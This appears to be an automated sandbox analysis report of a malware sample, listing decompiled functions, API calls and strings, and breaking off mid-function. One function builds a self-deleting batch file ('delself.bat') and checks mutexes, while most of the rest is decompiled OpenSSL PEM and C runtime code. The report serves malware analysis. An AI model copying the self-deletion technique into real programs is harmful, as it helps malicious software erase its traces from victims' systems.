0x0041258b
0x0041258d
0x00000000
0x0041256e
0x0041256e
0x00412574
0x00412584
0x00412584
0x004124f5
0x00412504
0x00412509
0x0041250f
0x0041251a
0x00412539
0x0041253b
0x00412597
0x0041259e
0x004125ba
0x004125cd
0x004125e4
0x004125fa
0x00412606
0x0041261a
0x00412628
0x00412636
0x00412646
0x00412654
0x00412664
0x00412672
0x00412680
0x00412690
0x0041269e
0x004126af
0x004126b8
0x004126b8
0x004126d7
0x004126dd
0x004126e3
0x004126e5
0x004126e8
0x004126e8
0x004126ea
0x004126eb
0x00412700
0x00412707
0x0041270e
0x00412718
0x00412720
0x00412729
0x00412730
0x00412735
0x00412747
0x0041275b
0x00412769
0x00412788
0x00412791
0x0041279e
0x004125a0
0x004125ab
0x004125ab
0x0041251c
0x0041251c
0x00412522
0x00412532
0x00412532
0x0041251a

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

"if exist ", xrefs: 00412648
" goto try, xrefs: 00412666
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547
@echo off:trydel ", xrefs: 0041262A
delself.bat, xrefs: 0041261C
TEMP, xrefs: 004125DF
D, xrefs: 00412720
del ", xrefs: 00412674

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E004635B0(void* __ebx, intOrPtr* __edx, void* __ebp, char _a4, char _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, char _a32, char _a36, char _a132, char _a137, char _a141, char _a143, char _a386, signed int _a388, intOrPtr _a396, intOrPtr* _a400, intOrPtr* _a404, intOrPtr* _a408, intOrPtr* _a412) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* __edi;
				void* __esi;
				signed int _t125;
				void* _t141;
				void* _t146;
				void* _t151;
				void* _t157;
				intOrPtr _t159;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t173;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				intOrPtr _t183;
				char _t186;
				intOrPtr _t188;
				intOrPtr _t193;
				intOrPtr _t206;
				intOrPtr _t210;
				intOrPtr _t218;
				void* _t219;
				intOrPtr _t222;
				intOrPtr _t224;
				char _t236;
				void* _t237;
				void* _t240;
				void* _t241;
				intOrPtr _t244;
				intOrPtr _t251;
				void* _t252;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t258;
				intOrPtr* _t261;
				intOrPtr _t262;
				intOrPtr _t263;
				intOrPtr _t264;
				intOrPtr* _t265;
				void* _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				signed int _t271;
				signed int _t272;
				void* _t274;
				void* _t275;
				void* _t279;
				void* _t280;
				void* _t284;

				_t247 = __edx;
				E0042F7C0(0x188);
				_t125 =  *0x50ad20; // 0x727261cc
				_a388 = _t125 ^ _t271;
				_push(__ebx);
				_a16 = _a400;
				_push(__ebp);
				_a28 = _a404;
				_t251 = _a396;
				_a20 = _a408;
				_a12 = _t251;
				_a24 = _a412;
				_a4 = 0;
				_t236 = E0045AF30(__ebx, __edx, _t251);
				_a8 = _t236;
				_t257 = E0045AF30(_t236, __edx, _t251);
				_v0 = _t257;
				_t269 = E0045AF30(_t236, __edx, _t251);
				if(_t236 == 0 || _t257 == 0 || _t269 == 0) {
					E0045AD10(_t236);
					E0045AD10(_t257);
					E0045AD10(_t269);
					E004512D0(_t236, _t247, _t251, _t269, __eflags, 9, 0x6d, 0x41, ".\\crypto\\pem\\pem_lib.c", 0x2b4);
					_t272 = _t271 + 0x20;
					goto L72;
				} else {
					_a386 = 0;
					_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
					_t274 = _t271 + 0xc;
					_t284 = _t141;
					if(_t284 <= 0) {
						L14:
						_push(0x2bf);
						_push(".\\crypto\\pem\\pem_lib.c");
						_push(0x6c);
						goto L15;
					} else {
						do {
							if(_t284 >= 0) {
								while( *((char*)(_t274 + _t141 + 0x94)) <= 0x20) {
									_t141 = _t141 - 1;
									if(_t141 >= 0) {
										continue;
									}
									goto L8;
								}
							}
							L8:
							 *((char*)(_t274 + _t141 + 0x95)) = 0xa;
							_t146 = _t141 + 2;
							if(_t146 >= 0x100) {
								L74:
								E0042AC83();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t251);
								_t253 = E0044F960(_t236, _t247, E004656B0());
								__eflags = _t253;
								if(__eflags != 0) {
									_push(_t257);
									E0044F3E0(_t253, _t269, _t253, 0x6a, 0, _v12);
									_push(_a4);
									_push(_v0);
									_push(_v4);
									_push(_v8);
									_push(_t253);
									_t151 = E00463C30(_t247, _t269);
									E0044F5E0(_t253);
									return _t151;
								} else {
									E004512D0(_t236, _t247, _t253, _t269, __eflags, 9, 0x71, 7, ".\\crypto\\pem\\pem_lib.c", 0x248);
									__eflags = 0;
									return 0;
								}
							} else {
								 *((char*)(_t274 + _t146 + 0x98)) = 0;
								_t157 = E00448190( &_a132, "-----BEGIN ", 0xb);
								_t279 = _t274 + 0xc;
								if(_t157 != 0) {
									goto L13;
								} else {
									_t261 =  &_a143;
									_t240 = _t261 + 1;
									do {
										_t159 =  *_t261;
										_t261 = _t261 + 1;
									} while (_t159 != 0);
									_t257 = _t261 - _t240;
									_t162 = E00448190( &_a137 + _t257, "-----\n", 6);
									_t279 = _t279 + 0xc;
									if(_t162 == 0) {
										_t164 = E0045AD50(_t236, _t247, _t269, _t236, _t257 + 9);
										_t274 = _t279 + 8;
										__eflags = _t164;
										if(__eflags != 0) {
											E0042D8D0( *((intOrPtr*)(_t236 + 4)),  &_a143, _t257 - 6);
											_t168 =  *((intOrPtr*)(_t236 + 4));
											_t236 = 0;
											 *((char*)(_t168 + _t257 - 6)) = 0;
											_t262 = _v0;
											_t169 = E0045AD50(0, _t247, _t269, _t262, 0x100);
											_t274 = _t274 + 0x14;
											__eflags = _t169;
											if(__eflags != 0) {
												 *((char*)( *((intOrPtr*)(_t262 + 4)))) = 0;
												_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
												_t274 = _t274 + 0xc;
												__eflags = _t263;
												if(__eflags <= 0) {
													L32:
													_t264 = 0;
													__eflags = 0;
													goto L33;
												} else {
													do {
														if(__eflags >= 0) {
															while(1) {
																__eflags =  *((char*)(_t274 + _t263 + 0x94)) - 0x20;
																if( *((char*)(_t274 + _t263 + 0x94)) > 0x20) {
																	goto L27;
																}
																_t263 = _t263 - 1;
																__eflags = _t263;
																if(_t263 >= 0) {
																	continue;
																}
																goto L27;
															}
														}
														L27:
														 *((char*)(_t274 + _t263 + 0x95)) = 0xa;
														_t257 = _t263 + 2;
														__eflags = _t257 - 0x100;
														if(_t257 >= 0x100) {
															goto L74;
														} else {
															 *((char*)(_t274 + _t257 + 0x94)) = 0;
															__eflags = _a132 - 0xa;
															if(_a132 == 0xa) {
																goto L32;
															} else {
																_t251 = _t257 + _t236;
																_t222 = E0045AD50(_t236, _t247, _t269, _v0, _t251 + 9);
																_t274 = _t274 + 8;
																__eflags = _t222;
																if(__eflags == 0) {
																	_push(0x2e4);
																	goto L22;
																} else {
																	_t224 = E00448190( &_a132, "-----END ", 9);
																	_t274 = _t274 + 0xc;
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_t251 = _a12;
																		_t264 = 1;
																		L33:
																		_a4 = 0;
																		_t173 = E0045AD50(_t236, _t247, _t269, _t269, 0x400);
																		_t274 = _t274 + 8;
																		__eflags = _t173;
																		if(__eflags != 0) {
																			 *_a4 = 0;
																			__eflags = _t264;
																			if(_t264 != 0) {
																				_t251 = _t269;
																				_v0 = _t251;
																				_t269 = _v0;
																				_a4 = _t236;
																				goto L51;
																			} else {
																				_t267 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
																				_t274 = _t274 + 0xc;
																				__eflags = _t267;
																				if(_t267 <= 0) {
																					L50:
																					_t251 = _v0;
																					L51:
																					_t236 = _a8;
																					_t265 =  *((intOrPtr*)(_t236 + 4));
																					_t83 = _t265 + 1; // 0x9
																					_t241 = _t83;
																					do {
																						_t176 =  *_t265;
																						_t265 = _t265 + 1;
																						__eflags = _t176;
																					} while (_t176 != 0);
																					_t266 = _t265 - _t241;
																					_t178 = E00448190( &_a132, "-----END ", 9);
																					_t274 = _t274 + 0xc;
																					__eflags = _t178;
																					if(__eflags != 0) {
																						L70:
																						_push(0x322);
																						_push(".\\crypto\\pem\\pem_lib.c");
																						_push(0x66);
																						goto L15;
																					} else {
																						_t180 = E00448190( *((intOrPtr*)(_t236 + 4)),  &_a141, _t266);
																						_t274 = _t274 + 0xc;
																						__eflags = _t180;
																						if(__eflags != 0) {
																							goto L70;
																						} else {
																							_t183 = E00448190( &_a141 + _t266, "-----\n", 6);
																							_t274 = _t274 + 0xc;
																							__eflags = _t183;
																							if(__eflags != 0) {
																								goto L70;
																							} else {
																								E0047E5B0( &_a36);
																								_push(_a4);
																								_t186 = _a4;
																								_push(_t186);
																								_push( &_a4);
																								_push(_t186);
																								_push( &_a36);
																								_t188 = E0047E5D0();
																								_t274 = _t274 + 0x18;
																								__eflags = _t188;
																								if(__eflags >= 0) {
																									_t193 = E0047E560( &_a36, _a4 + _a4,  &_a32);
																									_t275 = _t274 + 0xc;
																									__eflags = _t193;
																									if(__eflags >= 0) {
																										_t244 = _a4 + _a32;
																										__eflags = _t244;
																										_a4 = _t244;
																										if(_t244 == 0) {
																											goto L17;
																										} else {
																											 *_a16 =  *((intOrPtr*)(_t236 + 4));
																											 *_a28 =  *((intOrPtr*)(_t251 + 4));
																											_t247 = _a20;
																											 *_a20 = _a4;
																											 *_a24 = _t244;
																											E00454C70(_t236);
																											E00454C70(_t251);
																											E00454C70(_t269);
																											_t272 = _t275 + 0xc;
																										}
																									} else {
																										_push(0x332);
																										_push(".\\crypto\\pem\\pem_lib.c");
																										_push(0x64);
																										goto L15;
																									}
																								} else {
																									_push(0x32c);
																									_push(".\\crypto\\pem\\pem_lib.c");
																									_push(0x64);
																									goto L15;
																								}
																							}
																						}
																					}
																					goto L73;
																				} else {
																					_t236 = 0;
																					__eflags = _t267;
																					do {
																						if(__eflags >= 0) {
																							while(1) {
																								__eflags =  *((char*)(_t274 + _t267 + 0x94)) - 0x20;
																								if( *((char*)(_t274 + _t267 + 0x94)) > 0x20) {
																									goto L44;
																								}
																								_t267 = _t267 - 1;
																								__eflags = _t267;
																								if(_t267 >= 0) {
																									continue;
																								}
																								goto L44;
																							}
																						}
																						L44:
																						 *((char*)(_t274 + _t267 + 0x95)) = 0xa;
																						_t257 = _t267 + 2;
																						__eflags = _t257 - 0x100;
																						if(_t257 >= 0x100) {
																							goto L74;
																						} else {
																							__eflags = _t257 - 0x41;
																							 *((char*)(_t274 + _t257 + 0x94)) = 0;
																							_t236 =  !=  ? 1 : _t236;
																							_t206 = E00448190( &_a132, "-----END ", 9);
																							_t274 = _t274 + 0xc;
																							__eflags = _t206;
																							if(_t206 == 0) {
																								goto L50;
																							} else {
																								__eflags = _t257 - 0x41;
																								if(_t257 > 0x41) {
																									goto L50;
																								} else {
																									_t210 = E0045AE30(_t236, _t247, _t269, _t269, _a4 + 9 + _t257);
																									_t274 = _t274 + 8;
																									__eflags = _t210;
																									if(__eflags == 0) {
																										_push(0x303);
																										goto L22;
																									} else {
																										E0042D8D0(_a4 + _a4,  &_a132, _t257);
																										_t280 = _t274 + 0xc;
																										_push(0xfe);
																										 *((char*)(_a4 + _t257 + _a4)) = 0;
																										_a4 = _a4 + _t257;
																										_push( &_a132);
																										_push(_t251);
																										__eflags = _t236;
																										if(_t236 != 0) {
																											_a132 = 0;
																											_t218 = E0044F780(_t251, _t269);
																											_t274 = _t280 + 0xc;
																											__eflags = _t218;
																											if(_t218 <= 0) {
																												goto L50;
																											} else {
																												while(1) {
																													__eflags =  *((char*)(_t274 + _t218 + 0x94)) - 0x20;
																													if( *((char*)(_t274 + _t218 + 0x94)) > 0x20) {
																														break;
																													}
																													_t218 = _t218 - 1;
																													__eflags = _t218;
																													if(_t218 >= 0) {
																														continue;
																													}
																													break;
																												}
																												 *((char*)(_t274 + _t218 + 0x95)) = 0xa;
																												_t219 = _t218 + 2;
																												__eflags = _t219 - 0x100;
																												if(_t219 >= 0x100) {
																													goto L74;
																												} else {
																													 *((char*)(_t274 + _t219 + 0x94)) = 0;
																													goto L50;
																												}
																											}
																										} else {
																											goto L49;
																										}
																									}
																								}
																							}
																						}
																						goto L77;
																						L49:
																						_t267 = E0044F780(_t251, _t269);
																						_t274 = _t280 + 0xc;
																						__eflags = _t267;
																					} while (__eflags > 0);
																					goto L50;
																				}
																			}
																		} else {
																			_push(0x2f1);
																			goto L22;
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
														goto L77;
														L31:
														E0042D8D0( *((intOrPtr*)(_v0 + 4)) + _t236,  &_a132, _t257);
														 *((char*)( *((intOrPtr*)(_v0 + 4)) + _t257 + _t236)) = 0;
														_t236 = _t251;
														_t251 = _a12;
														_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
														_t274 = _t274 + 0x18;
														__eflags = _t263;
													} while (__eflags > 0);
													goto L32;
												}
											} else {
												_push(0x2d8);
												L22:
												_push(".\\crypto\\pem\\pem_lib.c");
												_push(0x41);
												_push(0x6d);
												_push(9);
												E004512D0(_t236, _t247, _t251, _t269, __eflags);
												_t236 = _a8;
												goto L16;
											}
										} else {
											_push(0x2ce);
											_push(".\\crypto\\pem\\pem_lib.c");
											_push(0x41);
											L15:
											_push(0x6d);
											_push(9);
											E004512D0(_t236, _t247, _t251, _t269, _t291);
											L16:
											_t275 = _t274 + 0x14;
											L17:
											E0045AD10(_t236);
											E0045AD10(_v0);
											E0045AD10(_t269);
											_t272 = _t275 + 0xc;
											L72:
											L73:
											_pop(_t252);
											_pop(_t258);
											_pop(_t237);
											return E0042A77E(_t237, _a388 ^ _t272, _t247, _t252, _t258);
										}
									} else {
										goto L13;
									}
								}
							}
							goto L77;
							L13:
							_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
							_t274 = _t279 + 0xc;
							_t291 = _t141;
						} while (_t141 > 0);
						goto L14;
					}
				}
				L77:
			}

0x004635b0
0x004635b5
0x004635ba
0x004635c1
0x004635cf
0x004635d0
0x004635db
0x004635dc
0x004635e9
0x004635f0
0x004635fb
0x004635ff
0x00463603
0x00463610
0x00463612
0x0046361b
0x0046361d
0x00463626
0x0046362a
0x00463b6f
0x00463b75
0x00463b7b
0x00463b90
0x00463b95
0x00000000
0x00463640
0x0046364c
0x00463656
0x0046365b
0x0046365e
0x00463660
0x00463704
0x00463704
0x00463709
0x0046370e
0x00000000
0x00463666
0x00463666
0x00463666
0x00463670
0x0046367a
0x0046367b
0x00000000
0x00000000
0x00000000
0x0046367b
0x00463670
0x0046367d
0x0046367d
0x00463685
0x0046368d
0x00463bb3
0x00463bb3
0x00463bb8
0x00463bb9
0x00463bba
0x00463bbb
0x00463bbc
0x00463bbd
0x00463bbe
0x00463bbf
0x00463bc0
0x00463bcc
0x00463bd1
0x00463bd3
0x00463bf1
0x00463bfb
0x00463c00
0x00463c04
0x00463c08
0x00463c0c
0x00463c10
0x00463c11
0x00463c19
0x00463c25
0x00463bd5
0x00463be5
0x00463bed
0x00463bf0
0x00463bf0
0x00463693
0x00463695
0x004636aa
0x004636af
0x004636b4
0x00000000
0x004636b6
0x004636b6
0x004636bd
0x004636c0
0x004636c0
0x004636c2
0x004636c3
0x004636c7
0x004636da
0x004636df
0x004636e4
0x0046373e
0x00463743
0x00463746
0x00463748
0x00463767
0x0046376c
0x0046376f
0x00463776
0x0046377b
0x00463780
0x00463785
0x00463788
0x0046378a
0x004637b2
0x004637c2
0x004637c4
0x004637c7
0x004637c9
0x0046388c
0x0046388c
0x0046388c
0x00000000
0x004637cf
0x004637cf
0x004637cf
0x004637d1
0x004637d1
0x004637d9
0x00000000
0x00000000
0x004637db
0x004637db
0x004637dc
0x00000000
0x00000000
0x00000000
0x004637dc
0x004637d1
0x004637de
0x004637de
0x004637e6
0x004637e9
0x004637ef
0x00000000
0x004637f5
0x004637f5
0x004637fd
0x00463805
0x00000000
0x0046380b
0x0046380b
0x00463816
0x0046381b
0x0046381e
0x00463820
0x004638bd
0x00000000
0x00463826
0x00463835
0x0046383a
0x0046383d
0x0046383f
0x004638b2
0x004638b6
0x0046388e
0x00463894
0x0046389c
0x004638a1
0x004638a4
0x004638a6
0x004638ca
0x004638cd
0x004638cf
0x00463ace
0x00463ad0
0x00463ad4
0x00463ad6
0x00000000
0x004638d5
0x004638e8
0x004638ea
0x004638ed
0x004638ef
0x004639c4
0x004639c4
0x004639c8
0x004639c8
0x004639cc
0x004639cf
0x004639cf
0x004639d2
0x004639d2
0x004639d4
0x004639d5
0x004639d5
0x004639e2
0x004639ea
0x004639ef
0x004639f2
0x004639f4
0x00463b5d
0x00463b5d
0x00463b62
0x00463b67
0x00000000
0x004639fa
0x00463a06
0x00463a0b
0x00463a0e
0x00463a10
0x00000000
0x00463a16
0x00463a27
0x00463a2c
0x00463a2f
0x00463a31
0x00000000
0x00463a37
0x00463a3c
0x00463a41
0x00463a45
0x00463a4c
0x00463a4d
0x00463a4e
0x00463a53
0x00463a54
0x00463a59
0x00463a5c
0x00463a5e
0x00463af1
0x00463af6
0x00463af9
0x00463afb
0x00463b12
0x00463b12
0x00463b16
0x00463b1a
0x00000000
0x00463b20
0x00463b28
0x00463b31
0x00463b33
0x00463b3a
0x00463b40
0x00463b42
0x00463b48
0x00463b4e
0x00463b53
0x00463b56
0x00463afd
0x00463afd
0x00463b02
0x00463b07
0x00000000
0x00463b07
0x00463a64
0x00463a64
0x00463a69
0x00463a6e
0x00000000
0x00463a6e
0x00463a5e
0x00463a31
0x00463a10
0x00000000
0x004638f5
0x004638f5
0x004638f7
0x004638f9
0x004638f9
0x00463900
0x00463900
0x00463908
0x00000000
0x00000000
0x0046390a
0x0046390a
0x0046390b
0x00000000
0x00000000
0x00000000
0x0046390b
0x00463900
0x0046390d
0x0046390d
0x00463915
0x00463918
0x0046391e
0x00000000
0x00463924
0x00463924
0x00463927
0x00463936
0x00463946
0x0046394b
0x0046394e
0x00463950
0x00000000
0x00463952
0x00463952
0x00463955
0x00000000
0x00463957
0x00463962
0x00463967
0x0046396a
0x0046396c
0x00463ac0
0x00000000
0x00463972
0x00463983
0x0046398b
0x00463994
0x00463999
0x004639a4
0x004639a8
0x004639a9
0x004639aa
0x004639ac
0x00463a75
0x00463a7d
0x00463a82
0x00463a85
0x00463a87
0x00000000
0x00463a90
0x00463a90
0x00463a90
0x00463a98
0x00000000
0x00000000
0x00463a9a
0x00463a9a
0x00463a9b
0x00000000
0x00000000
0x00000000
0x00463a9b
0x00463a9d
0x00463aa5
0x00463aa8
0x00463aad
0x00000000
0x00463ab3
0x00463ab3
0x00000000
0x00463ab3
0x00463aad
0x00000000
0x00000000
0x00000000
0x004639ac
0x0046396c
0x00463955
0x00463950
0x00000000
0x004639b2
0x004639b7
0x004639b9
0x004639bc
0x004639bc
0x00000000
0x004638f9
0x004638ef
0x004638a8
0x004638a8
0x00000000
0x004638a8
0x00000000
0x00000000
0x00000000
0x0046383f
0x00463820
0x00463805
0x00000000
0x00463841
0x00463854
0x00463867
0x00463873
0x00463875
0x0046387f
0x00463881
0x00463884
0x00463884
0x00000000
0x004637cf
0x0046378c
0x0046378c
0x00463791
0x00463791
0x00463796
0x00463798
0x0046379a
0x0046379c
0x004637a1
0x00000000
0x004637a1
0x0046374a
0x0046374a
0x0046374f
0x00463754
0x00463710
0x00463710
0x00463712
0x00463714
0x00463719
0x00463719
0x0046371c
0x0046371d
0x00463726
0x0046372c
0x00463731
0x00463b98
0x00463b9a
0x00463ba1
0x00463ba2
0x00463ba4
0x00463bb2
0x00463bb2
0x00000000
0x00000000
0x00000000
0x004636e4
0x004636b4
0x00000000
0x004636e6
0x004636f4
0x004636f9
0x004636fc
0x004636fc
0x00000000
0x00463666
0x00463660
0x00000000

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
, xrefs: 00463A90
-----BEGIN , xrefs: 004636A4
-----, xrefs: 004636D4, 00463A21
-----END , xrefs: 0046382F, 00463940, 004639E4

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Uniqueness

Uniqueness Score: -1.00%

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00425A97(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E00428C96(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E00428C96(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E00428C96(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E004255AC( *_t42, 0x50aae8);
								_t15 = E00425E97(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E00420BED();
									E0042453C( *_t42);
									E004243E2( *_t42);
									E00420BED(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00424BDD(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E00420BED( *_t42);
							E00420BED(_t42);
							L8:
							goto L3;
						}
						E00420BED(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00425208(_t48))) = 0xc;
					goto L4;
				}
			}

0x00425aa0
0x00425ac6
0x00000000
0x00425aa8
0x00425ab3
0x00425ab7
0x00425ab9
0x00425ad2
0x00425ad7
0x00425adb
0x00425add
0x00425aee
0x00425af3
0x00425af8
0x00425afa
0x00425b13
0x00425b20
0x00425b28
0x00425b2b
0x00425b2d
0x00425b42
0x00425b42
0x00425b49
0x00425b50
0x00425b56
0x00425b5e
0x00425b67
0x00000000
0x00425b67
0x00425b31
0x00425b34
0x00425b3b
0x00425b3d
0x00425b65
0x00000000
0x00425b65
0x00425b3f
0x00000000
0x00425b3f
0x00425afe
0x00425b04
0x00425ae5
0x00000000
0x00425ae5
0x00425ae0
0x00000000
0x00425ae0
0x00425abb
0x00425ac0
0x00000000
0x00425ac0

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041BAE0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				char _v28;
				char _v32;
				char _v48;
				char _v2316;
				char _v2320;
				long _v2328;
				int _v2332;
				short _v2348;
				long _v2352;
				int _v2356;
				char _v2364;
				short _v2372;
				char _v2376;
				int _v2392;
				int _v2396;
				long _v2408;
				int _v2412;
				int _v2416;
				short _v2428;
				char _v2432;
				char _v2436;
				signed int _v2440;
				char _v2444;
				signed int _v2456;
				void* _v2460;
				signed int _v2468;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t100;
				intOrPtr* _t101;
				long _t102;
				void* _t111;
				long _t117;
				void* _t125;
				void* _t128;
				void* _t136;
				intOrPtr _t140;
				long _t141;
				long _t150;
				intOrPtr* _t151;
				long _t152;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t158;
				void* _t161;
				int _t164;
				intOrPtr* _t165;
				signed int _t170;
				short* _t171;
				short* _t172;
				intOrPtr* _t176;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				DWORD* _t194;
				struct HWND__* _t195;
				struct HWND__* _t203;
				intOrPtr _t206;
				intOrPtr _t208;
				signed int _t211;
				signed int _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				short* _t218;
				short* _t219;
				void* _t221;

				_t212 = _t211 & 0xfffffff8;
				_t164 = _a8;
				_push(0xffffffff);
				_push(0x4cb187);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t212;
				_t213 = _t212 - 0x978;
				_push(_t158);
				_push(_t191);
				_t221 = _t164 - 0x8001;
				if(_t221 > 0) {
					_t100 = _t164 - 0x8003;
					__eflags = _t100;
					if(_t100 == 0) {
						_t165 =  *0x513268;
						_t101 =  *_t165;
						__eflags = _t101 - _t165;
						if(_t101 == _t165) {
							L46:
